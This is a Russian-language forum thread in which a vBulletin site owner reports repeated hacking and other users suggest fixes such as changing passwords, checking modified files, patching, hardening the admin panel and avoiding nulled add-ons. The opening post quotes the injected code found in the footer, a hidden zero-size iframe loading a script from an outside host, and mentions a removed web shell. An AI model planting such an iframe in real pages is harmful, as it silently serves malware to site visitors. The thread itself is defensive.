[Помогите] Хакер ломает форум

Тема в разделе "vBulletin 4.2.x", создана пользователем SergAgent, 20 июл 2013.

  1. SergAgent

    SergAgent

    Регистрация:
    6 фев 2013
    Сообщения:
    119
    Симпатии:
    3
    История: профили на форуме перестали открываться, пишет Пользователь не зарегистрирован и не имеет профиля для просмотра., перестал работать переход по страницам в темах, дальше первой страницы не откроешь.
    Админ нашел в футере
    PHP:
    <iframe src="http://drh5.usfreightways.me:38/mean.php" height="0" width="0"></iframe>
    В файловой системе нашел и удалил шелл /vb/exception/model1.php по логам залитый 12 мая с IP 46.4.194.178
    Разумеется были сменены все пароли, то есть у админов, фтп, к БД, к пользователю БД, и вроде как все стало работать.
    Но вчера опять всё повторилось, в футере ничего нет, в файловой системе пока не смотрел, новый пароль только у админа, и вряд ли так быстро можно было его подобрать, пароли не из легких.
    В общем что делать? где еще искать уязвимость?
     
  2. yurets86

    yurets86

    Регистрация:
    13 апр 2013
    Сообщения:
    394
    Симпатии:
    328
    значит не все закрыли...
    попробуйте менять пароль после того как все почистите... есть вариант, что стучалка есть - вы меняете пароль, она его отправляет, потом вы ее удаляете, человек заходит, делает свои дела и снова ее ставит...
    а вообще, через тотал командер заходите на сервер и смотрите по дате изменения файлов, так же можно сделать поиск, по всем измененным файлам за последний месяц. два или больше. а потом сверять с оригиналом файла.

    и получается что он вставляет свой фрейм, который не понятно что делает, так что сразу удаляем, потом меняем пароли
     
  3. SergAgent

    SergAgent

    Регистрация:
    6 фев 2013
    Сообщения:
    119
    Симпатии:
    3
    смотрели через валидатор от DGT, ничего нет
     
  4. yurets86

    yurets86

    Регистрация:
    13 апр 2013
    Сообщения:
    394
    Симпатии:
    328
    лучше не полениться и сделать старым дедовским способом =) сделать самому и ручками )
     
  5. SergAgent

    SergAgent

    Регистрация:
    6 фев 2013
    Сообщения:
    119
    Симпатии:
    3
    больше вероятность что админ что то пропустит а не валидатор, тем более валидатор как бы реально от DGT
     
  6. yurets86

    yurets86

    Регистрация:
    13 апр 2013
    Сообщения:
    394
    Симпатии:
    328

    здесь все может быть, может и человеческий фактор сыграл и все ровно, я бы так не надеялся на эту софтину иногда, эти "реальные" софты и сливают инфу или с помощью их

    еще вариант, если офиц. форум с лицензией то при наличии обновлений - обновится
     
    blessed нравится это.
  7. SergAgent

    SergAgent

    Регистрация:
    6 фев 2013
    Сообщения:
    119
    Симпатии:
    3
    вариант с лицензией отпадает
    буду надеяться что с доступом к фтп админ все же что нибудь найдет, иначе нахрен этот vBulletin
     
  8. kolyaya

    kolyaya

    Регистрация:
    20 июл 2013
    Сообщения:
    9
    Симпатии:
    3
    Меняйте все пароли, админка, ftp, mysql.
    Посмотри на наличее уязвимостей в модулях, это все ищется через google.
     
  9. SergAgent

    SergAgent

    Регистрация:
    6 фев 2013
    Сообщения:
    119
    Симпатии:
    3
    уязвимость была в VSa - ChatBox v.3.1.8 Ru, пришлось его врубить
     
  10. NOD

    NOD

    Регистрация:
    10 авг 2013
    Сообщения:
    19
    Симпатии:
    3
    Обновитесь. На офсайте есть патчи безопасности (если конечно у Вас лицензионный форум)
     
  11. Brusie

    Brusie

    Регистрация:
    15 янв 2013
    Сообщения:
    9
    Симпатии:
    7
    SiteLock как вариант защишает от всяких атак
     
    SergAgent нравится это.
  12. Moro3zz

    Moro3zz

    Регистрация:
    5 апр 2013
    Сообщения:
    22
    Симпатии:
    7
    Есть самые простые правила безопасности для воблы

    - переименовать папку к админке
    - убедитесь, что у Вас в настройках включена защита от подбора пароля
    - убрать права аккаунту с ID 1
    - дополнительно запаролить админку
     
    raynar нравится это.
  13. Lion18

    Lion18

    Регистрация:
    3 дек 2012
    Сообщения:
    253
    Симпатии:
    30
    С этим всем всеравно пройдет через некачественный мод типа чата.
    Но на прямой взлом начинающих взломщиков отпугнет...
     
  14. Valentinvv

    Valentinvv

    Регистрация:
    6 дек 2015
    Сообщения:
    5
    Симпатии:
    0
    У меня была подобная ситуация на вобле 4.1.4, форум ломали вставляя фрэймы. При удалении появлялись снова. Обратился на форум по вобле там посоветовали обновить до версии 4.2.2., я так и сделал, но это ничем не помогло. Вредоносный код, насколько я понял, был вписан в sql, и хакер всегда менял шаблон FORUMHOME, при чем после удаления вставок, они потом снова появлялись. Вопрос был решен установкой мода debug module admin cp. Хотя даже после его установки я 2 раза тоже удалял iframe, но все равно считаю что этот модуль мне очень сильно помог.
     
  15. bloodlight

    bloodlight

    Регистрация:
    24 мар 2013
    Сообщения:
    44
    Симпатии:
    38
    Да, и еще не стоит ставить нулленые версии всяких дополнений, в них так же могут быть бекдоры.